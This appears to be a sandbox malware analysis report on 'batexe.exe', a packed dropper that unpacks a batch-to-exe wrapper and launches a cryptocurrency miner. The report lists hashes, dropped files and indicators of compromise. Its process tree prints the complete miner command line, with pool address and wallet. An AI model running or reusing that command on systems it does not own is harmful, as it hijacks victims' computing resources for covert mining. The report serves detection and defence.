73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
301s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13-02-2024 04:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2336	b2e.exe
4644	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4644	cpuminer-sse2.exe
4644	cpuminer-sse2.exe
4644	cpuminer-sse2.exe
4644	cpuminer-sse2.exe
4644	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4224-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4224 wrote to memory of 2336	4224	batexe.exe	37
PID 4224 wrote to memory of 2336	4224	batexe.exe	37
PID 4224 wrote to memory of 2336	4224	batexe.exe	37
PID 2336 wrote to memory of 3652	2336	b2e.exe	49
PID 2336 wrote to memory of 3652	2336	b2e.exe	49
PID 2336 wrote to memory of 3652	2336	b2e.exe	49
PID 3652 wrote to memory of 4644	3652	cmd.exe	53
PID 3652 wrote to memory of 4644	3652	cmd.exe	53

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\b2e.exe

Filesize
340KB

MD5
9a8fe80a854553823372346e6768210a

SHA1
7143cba2813603e85db029a65d29f37956800c96

SHA256
497c794b3d6c16f237f698496dfd38aeb1b3d5fdbe12000fa7a79e9f243f63b3

SHA512
a974fe2f24410d1c7c8a1e5d5575e97e1667f24f4ba1b29f2f5f610a880d362625274eec4b1b78b57abe54a2767657759666da640bbc150f96d2898857da9ffe

Download Submit
C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\b2e.exe

Filesize
272KB

MD5
0e8f8aab62eac627407b27c35cb1eb54

SHA1
18fa18f22672c0bed659cce186a4571cdaed1304

SHA256
4b9b47380bf6956a3d29e8afa5b1a089929621f671d1103e65207e47c84950bb

SHA512
3bb97b6df6f71b1f41b21b1e19a61e579b4573bc30fce167c5fb890f7bfb5ebafe6698bde7b32f1d8005784e9ecec9158499c632a04a7d5256c09a9cb0b969da

Download Submit
C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
99KB

MD5
5fa63353bf468b847de40660a5d3dcab

SHA1
5433a724f71fbf0ccc7d04776505bf3b529b05a4

SHA256
7cf4ad49e62f7fa1da31c3083f2a2425d6a4339c04052aecf7a0b97af55c8143

SHA512
6c2c5d9ea67428a4c7ad64f0ca25a379203ff6047cad2437f15c1b4f2f75c1727d9c8142febea72bd79ffe62b9a85c2b5922a8759e9de51ba893445838d01657

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
24KB

MD5
ef8565fc5e0b5b2db6072a413e5cb357

SHA1
e5377e367c7ee404103b0a61a81bc81bdf09758d

SHA256
3a5e8456ebe914ec1287e2f158fac752ad074f220424b64bce0e191c1a51629b

SHA512
cb90805a458ce43740aca77679098fb9b030ef4be8afe46b5218b827e02d84bb8dc0828e5b169172c431faf7e976d9b90011cbd86bf1fba187eb725a14b2cc08

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
107KB

MD5
a80fc8816720ba8d69d502ae2b74d41d

SHA1
8505cacadc7f0c3d4fea2f99ef81d71512c1d48c

SHA256
76c179bd6d67e2ede84b9b0ba0ff463bf1a90ee4254b765e8267e88d47d85bea

SHA512
3b55bf780f278d0a45e49f1487ef4205541fd286c4a6675d7e4b2da7d9a02844edac3c4486a9b6b7b98c71a386b7dc47206283f69eef0097675b52ab2dbc72f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
85KB

MD5
d1532ad51363d2483131885d2fda514b

SHA1
8d5043949de416bf6dd72ff85d3e531ffcc3c0d7

SHA256
c0acade119b9e8cfa0362317c03c8c19b1fe9a3ad4557e0036f2506827569b38

SHA512
3b2c6d042849a5b2a8f899dd1c0624327b41f457e550664d3383ae2375db66272dc729cee2418db9b1118f0d317498c4fac28d9929b90de96ae3d6bbba27962b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
149KB

MD5
31325ee097b2686dd3f7ed3c46dca632

SHA1
b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0

SHA256
a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8

SHA512
0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
214KB

MD5
a70a3921479aafc835f34b130b5191f0

SHA1
4cf2c580b994568548de69d5be501a2811948617

SHA256
7c0cd592ad8103200bd0d9b525283f10c511af1bb0b6882717b8ce2ab3ca050e

SHA512
8c1b4a718af61b4e6f1b3f48adeac73631a065c1f1c825eec6d87a0e365a417de1dafe893f8e157fb808b7f76915fa55411d98ffa886e1d9ceaae48dd1ae9188

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
160KB

MD5
fe491f0b65a57db15d078cb5cd34e29f

SHA1
9238fada63a7e125db55f9bf9e009fa2926255b2

SHA256
6e62364111ef0d6c7054c34c26a4bb425dbbd6a5dc6d7862bc25456a40d8d575

SHA512
ab04a727b0a16e22e6a8b116cd207d9a88135c2ae07ee0f479e0ebda6165ce0548bd5c094f01de36d2ad55c26bcc337c5f3277feecc5582fd8d99a64f86d520c

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
56KB

MD5
a833db52b1423cc94322e18e93f78e0c

SHA1
4a2e1e760dd1ba367cae25ef7a2a4319a1dfbbcd

SHA256
08e5e29ee21a9f704c5fc2742dfe327bc1b965f46cf9af57c6df229617d528a4

SHA512
f1bd2a151b6bad81edce1544585225b0b4ec84c98e651bdf21ab9f7532d497c861c51e078f38f5e7d90ba8a906e663057f22acdfc4bb05a1c3db64d923bfbb7d

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
108KB

MD5
ebbc3293e10a03389ee9a3eb5d00a505

SHA1
5e9ccafc395e26e201439dd681b701969e7ee055

SHA256
41e9a390f8d4114a6952999571b898eb60fdd578f400f2a8f7a262ecd7257a23

SHA512
b9b08724b2550e0044859d7b5709209a4bab22eef499a00f52f748693c34b93370b3e35469c3b715848cb0fa0aade187703540b512a1c56fd742760c3f7521b7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
dbc48f52f99096a33e60eaea44b7eb60

SHA1
d7dcdeea68df53bb0ca6378d632c7d56ffb35f65

SHA256
488a3fd194006fc5a09f7c08efd4ba615fa788fad21e2c1138f4808d579ff4e5

SHA512
569b841d31e82ea01ece362222e249cd95992f66e76b313c58323dcfc874d70d47ad9fdaed73b811309bd1c0d1b44ac1748d3ebd36f87a3605e3d0a42e3b544b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
91KB

MD5
cff762bbbc7ab477808a0673981e40eb

SHA1
605c199512943f0bf8239c57c368602bfaa05bcf

SHA256
6a48bbc98e44b24ba00ddf850a4dbaf0411f1a9a7d7ecf0fe3aed5685a87d45c

SHA512
28c2f202725e25a84f489cad649c961957b77e1afb45dba5adb9fadcfaafced068ef79e0776b906724456b63f2e29fef3a2f72888d3ecc7db32a7050b6967a20

Download Submit
memory/2336-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2336-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4224-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4644-43-0x0000000052760000-0x00000000527F8000-memory.dmp

Filesize
608KB

Download
memory/4644-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4644-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4644-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4644-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4644-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download